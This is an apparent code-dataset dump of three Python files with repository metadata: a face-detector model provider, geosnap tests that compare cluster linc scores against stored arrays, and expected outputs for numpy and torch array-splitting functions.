"Apache-2.0"
] | 1 | 2018-11-16T13:09:06.000Z | 2018-11-16T13:09:06.000Z | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
"Apache-2.0"
] | null | null | null | face_detector_ssd/model_provider.py | keiji/face_detector_with_tensorflow | 36a440b177c2decaa34ec8cd0311a8283969d932 | [
"Apache-2.0"
] | null | null | null | import model.model1
import model_lightweight.model10 as model10_lw
def get_model():
return model.model1
| 13.625 | 46 | 0.807339 | 16 | 109 | 5.3125 | 0.625 | 0.258824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 0.137615 | 109 | 7 | 47 | 15.571429 | 0.840426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
44eeaa67e8b6378a13ffb7d28f2c9830a040185a | 10,308 | py | Python | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 14 | 2018-09-19T22:34:44.000Z | 2019-04-03T17:18:22.000Z | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 55 | 2018-10-01T18:31:25.000Z | 2019-04-08T16:23:46.000Z | geosnap/tests/test_incs.py | WawNun/geosnap | 9838498b89d42c94fef73ee2983dd385dab17345 | [
"BSD-3-Clause"
] | 5 | 2018-10-02T21:41:46.000Z | 2019-01-25T02:59:16.000Z | from geosnap import analyze, DataStore
from geosnap.analyze.incs import lincs_from_gdf
from geosnap.io import get_census
from geosnap.harmonize import harmonize
from numpy.testing import assert_array_almost_equal
import numpy as np
linc = analyze.incs.linc
def test_linc():
labels_0 = [1, 1, 1, 1, 2, 2, 3, 3, 3, 4]
labels_1 = [1, 1, 1, 1, 1, 2, 3, 3, 3, 4]
res = linc([labels_0, labels_1])
assert res[4] == 1.0
assert res[7] == 0.0 == res[-1]
labels_2 = [1, 1, 1, 1, 1, 2, 3, 3, 3, 4]
res = linc([labels_1, labels_2])
assert res[0] == 0.0
res = linc([labels_0, labels_1, labels_2])
assert res[0] == 0.25
def test_linc_from_gdf():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=1990, intensive_variables=columns)
rdf = analyze.cluster(reno, columns=columns, method="ward")
l = lincs_from_gdf(
rdf, unit_index="geoid", temporal_index="year", cluster_col="ward"
)
assert_array_almost_equal(
l.linc.values,
np.array(
[
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.85714286,
0.5,
1.0,
0.8,
0.0,
0.0,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
0.8,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.85714286,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
0.0,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.5,
1.0,
1.0,
1.0,
0.0,
0.5,
0.5,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
),
decimal=3,
)
def test_linc_from_gdf_subset():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
"n_total_pop",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=1990, intensive_variables=columns)
rdf = analyze.cluster(
rdf,
columns=columns,
method="ward",
)
l = lincs_from_gdf(
rdf,
unit_index="geoid",
temporal_index="year",
cluster_col="ward",
periods=[2000, 2010],
)
assert_array_almost_equal(
l.linc.values,
np.array(
[
0.96969697,
0.78571429,
0.8,
0.75,
0.66666667,
0.8125,
0.78571429,
0.80952381,
1.0,
0.8,
0.75,
0.74074074,
0.80952381,
0.80952381,
0.92307692,
1.0,
0.8,
0.78571429,
0.78571429,
0.75,
0.8125,
0.75,
0.74074074,
0.74074074,
0.8,
0.75,
0.66666667,
0.90909091,
0.66666667,
0.92307692,
1.0,
1.0,
0.74074074,
0.80952381,
1.0,
1.0,
1.0,
0.74074074,
0.96969697,
1.0,
0.8125,
0.74074074,
0.74074074,
1.0,
0.80952381,
0.8125,
0.96153846,
0.90909091,
0.74074074,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.66666667,
0.96153846,
0.66666667,
0.66666667,
]
),
decimal=3,
)
def test_linc_method():
columns = [
"median_household_income",
"p_poverty_rate",
"p_unemployment_rate",
"n_total_pop",
]
reno = get_census(DataStore(), msa_fips="39900")
rdf = harmonize(reno, target_year=2010, intensive_variables=columns)
_, model = analyze.cluster(rdf, columns=columns, method="ward", return_model=True)
l = model.lincs.linc.values
assert_array_almost_equal(
l,
np.array(
[
0.9047619,
0.94594595,
0.82608696,
0.875,
0.97142857,
0.9047619,
1.0,
0.96428571,
0.97560976,
1.0,
0.82608696,
1.0,
0.92682927,
0.94285714,
1.0,
0.94285714,
0.92682927,
1.0,
0.90909091,
0.94285714,
1.0,
1.0,
1.0,
0.975,
0.9047619,
0.97560976,
1.0,
0.82608696,
0.82608696,
0.94594595,
0.875,
0.875,
0.96428571,
0.875,
0.90625,
1.0,
0.9137931,
0.98360656,
1.0,
0.875,
1.0,
0.98181818,
0.97619048,
0.90909091,
0.98181818,
0.90909091,
0.94594595,
0.82608696,
0.97619048,
0.90909091,
0.90625,
0.9137931,
0.93333333,
0.93333333,
1.0,
1.0,
0.93333333,
0.93333333,
0.975,
0.90625,
0.96666667,
0.96666667,
0.98507463,
0.9137931,
0.94339623,
0.93939394,
0.93939394,
0.94339623,
0.94339623,
0.9137931,
0.97142857,
0.875,
0.93939394,
0.93939394,
0.93939394,
0.98507463,
1.0,
1.0,
0.9047619,
0.96666667,
0.9047619,
0.90909091,
0.94339623,
0.90625,
0.90625,
0.9137931,
0.9137931,
0.98214286,
0.984375,
0.95918367,
0.95918367,
0.95918367,
0.92682927,
0.92682927,
0.98360656,
0.96551724,
0.98214286,
0.96551724,
0.984375,
1.0,
1.0,
0.98214286,
0.96551724,
0.90625,
0.90625,
0.98214286,
1.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
]
),
decimal=3,
)
| 23.427273 | 86 | 0.284245 | 984 | 10,308 | 2.895325 | 0.109756 | 0.228852 | 0.30537 | 0.390312 | 0.623026 | 0.492102 | 0.469287 | 0.427869 | 0.412425 | 0.412425 | 0 | 0.406202 | 0.621459 | 10,308 | 439 | 87 | 23.480638 | 0.323936 | 0 | 0 | 0.88361 | 0 | 0 | 0.023574 | 0.006694 | 0 | 0 | 0 | 0 | 0.019002 | 1 | 0.009501 | false | 0 | 0.014252 | 0 | 0.023753 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
44f30acbebf15a55d8cd1ec08c8b897d854673b5 | 31,762 | py | Python | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | null | null | null | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | null | null | null | test/unittest_split/create_expected_output_split.py | FrancisLi196/featurizer | dc7c817281b16aee21da7141f7996889efd2159e | [
"Apache-2.0"
] | 1 | 2020-12-09T07:43:29.000Z | 2020-12-09T07:43:29.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import torch
import pandas as pd
import numpy as np
from functools import reduce
import pdb
from featurizer.functions.split import *
###############
# 2d Data (for split() and split_sample())
###############
np.random.seed(520)
data2d_np = np.random.randn(11,3).round(2)
'''
>>> data2d_np
array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])
'''
############################# Expected output for split() ##############################
#################
# Case 1:
# the most basic scenario, where step = 1
#################
# data_list_split_basic = split(data2d_np, window=8, step=1, offset = 0, keep_tail=False)
expected_list_split_basic = [np.array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]),
np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##############
# Case 2:
# step = 2; expect a smaller sized last list
##############
# data_list_split_2steps = split(data2d_np, window=8, step=2, offset = 0, keep_tail=False)
expected_list_split_2steps = [np.array([[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[ 0.01, 1.92, -0.68]])]
################
# Case 3:
# keep_tail = True, while other parameters unchanged; expect a smaller sized first list
################
# data_list_split_kepttail = split(data2d_np, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split_kepttail = [np.array([[-1.41, -0.28, -0.03]]),
np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]),
np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
#################
# Case 4:
# offset = 2; expect one less list than if offset = 0
#################
# data_list_split_2offset = split(data2d_np, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split_2offset = [np.array([[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]),
np.array([[ 0.01, 1.92, -0.68]])]
############################# Expected output for split_sample() ##############################
# parameters consistent across tests for split_sample() and split_sample3d()
window_sample, step_sample, offset_sample = 5, 3, 1
##################
# Case 1:
# keep_tail = False, merge_remain = True
##################
# data_list_split_sample_FT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=True)
expected_list_split_sample_FT = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]),
np.array([[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##################
# Case 2:
# keep_tail = False, merge_remain = False
##################
# data_list_split_sample_FT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample_FF = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]),
np.array([[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]])]
##################
# Case 3:
# keep_tail = True, merge_remain = True
##################
# data_list_split_sample_TT = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample_TT = [np.array([[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##################
# Case 4:
# keep_tail = True, merge_remain = False
##################
# data_list_split_sample_TF = split_sample(data2d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=False)
expected_list_split_sample_TF = [np.array([[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]),
np.array([[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]])]
##########################################
##########################################
##################
# 3d data (for split3d() and split_sample3d())
##################
data3d_np_half = np.expand_dims(data2d_np, axis = 0)
data3d_np = np.vstack((data3d_np_half, data3d_np_half))
'''
>>> data3d_np
array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])
'''
############################# Expected output for split3d() ##############################
# test logic is identical to split()
##################
# Case 1:
# the most basic scenario, where step = 1
##################
# data_list_split3d_basic = split3d(data3d_np, window=8, step=1, offset=0, keep_tail=False, dim=1)
expected_list_split3d_basic = [np.array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]]),
np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##############
# Case 2:
# step = 2; expect a smaller sized last list
##############
# data_list_split3d_2steps = split3d(data3d_np, window=8, step=2, offset = 0, keep_tail=False)
expected_list_split3d_2steps = [np.array([[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-1.41, -0.28, -0.03],
[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[ 0.01, 1.92, -0.68]],
[[ 0.01, 1.92, -0.68]]])]
################
# Case 3:
# keep_tail = True, while other parameters unchanged; expect a smaller sized first list
################
# data_list_split3d_kepttail = split3d(data3d_np, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split3d_kepttail = [np.array([[[-1.41, -0.28, -0.03]],
[[-1.41, -0.28, -0.03]]]),
np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]]),
np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
#################
# Case 4:
# offset = 2; expect one less list than if offset = 0
#################
# data_list_split3d_2offset = split3d(data3d_np, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split3d_2offset = [np.array([[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]],
[[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25]]]),
np.array([[[ 0.01, 1.92, -0.68]],
[[ 0.01, 1.92, -0.68]]])]
############################# Expected output for split_sample3d() ##############################
# test logic is identical to split3d()
##################
# Case 1:
# keep_tail = False, merge_remain = True
##################
data_list_split_sample3d_FT = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=True)
expected_list_split_sample3d_FT = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]]),
np.array([[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################
# Case 2:
# keep_tail = False, merge_remain = False
##################
# data_list_split_sample3d_FF = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample3d_FF = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44]]]),
np.array([[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]],
[[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48]]])]
##################
# Case 3:
# keep_tail = True, merge_remain = True
##################
# data_list_split_sample3d_TT = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample3d_TT = [np.array([[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-0.3 , -1.31, 1.08],
[-0.16, -0.57, -0.61],
[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################
# Case 4:
# keep_tail = True, merge_remain = False
##################
# data_list_split_sample3d_TF = split_sample3d(data3d_np, window=window_sample, step=step_sample, offset=offset_sample, keep_tail=True, merge_remain=False)
expected_list_split_sample3d_TF = [np.array([[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]],
[[-0.61, -0.66, -0.07],
[-0.04, -0.47, 1.73],
[ 1.56, -0.31, -1.44],
[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97]]]),
np.array([[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]],
[[-0.01, -0.42, -0.89],
[-0.68, -0.95, -0.97],
[-0.1 , 0.49, -0.48],
[ 0.45, -0.63, -0.25],
[ 0.01, 1.92, -0.68]]])]
##################### Expected outputs from these split related functions when input is tensor ##################
def list_of_np_to_ts(lnp):
lts = []
for n in lnp:
lts.append(torch.tensor(n))
return lts
# create input ts data
data2d_ts = torch.tensor(data2d_np)
data3d_ts = torch.tensor(data3d_np)
# ------------- split() -------------
# data_list_split_ts = split(data2d_ts, window=8, step=2, offset = 2, keep_tail=False)
expected_list_split_ts = list_of_np_to_ts(expected_list_split_2offset)
# ------------- split_sample() -------------
# data_list_split_sample_ts = split_sample(data2d_ts, window=window_sample, step=step_sample, offset = offset_sample, keep_tail=False, merge_remain=False)
expected_list_split_sample_ts = list_of_np_to_ts(expected_list_split_sample_FF)
# ------------- split3d() -------------
# data_list_split_sample3d_ts = split3d(data3d_ts, window=8, step=2, offset = 0, keep_tail=True)
expected_list_split3d_ts = list_of_np_to_ts(expected_list_split3d_kepttail)
# ------------- split_sample3d() -------------
# data_list_split_sample3d_ts = split_sample3d(data3d_ts, window=window_sample, step=step_sample, offset = offset_sample, keep_tail=True, merge_remain=True)
expected_list_split_sample3d_ts = list_of_np_to_ts(expected_list_split_sample3d_TT)
| 53.381513 | 156 | 0.252534 | 3,289 | 31,762 | 2.344482 | 0.042566 | 0.029179 | 0.038905 | 0.037349 | 0.884191 | 0.864739 | 0.859292 | 0.848139 | 0.838802 | 0.821683 | 0 | 0.257674 | 0.560009 | 31,762 | 594 | 157 | 53.47138 | 0.294097 | 0.120899 | 0 | 0.889474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.002632 | false | 0 | 0.015789 | 0 | 0.021053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
780bf09ceb4db949cc97175af7c7765097e2db45 | 187,025 | py | Python | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
] | 4 | 2018-07-24T18:20:17.000Z | 2019-06-10T12:22:32.000Z | code/natural_language_understanding/inform_sentences_preparation.py | tanayz/SGbot | 983c756e1f0a2d5cb6d884fdfa34dc9c51eb74a0 | [
"MIT"
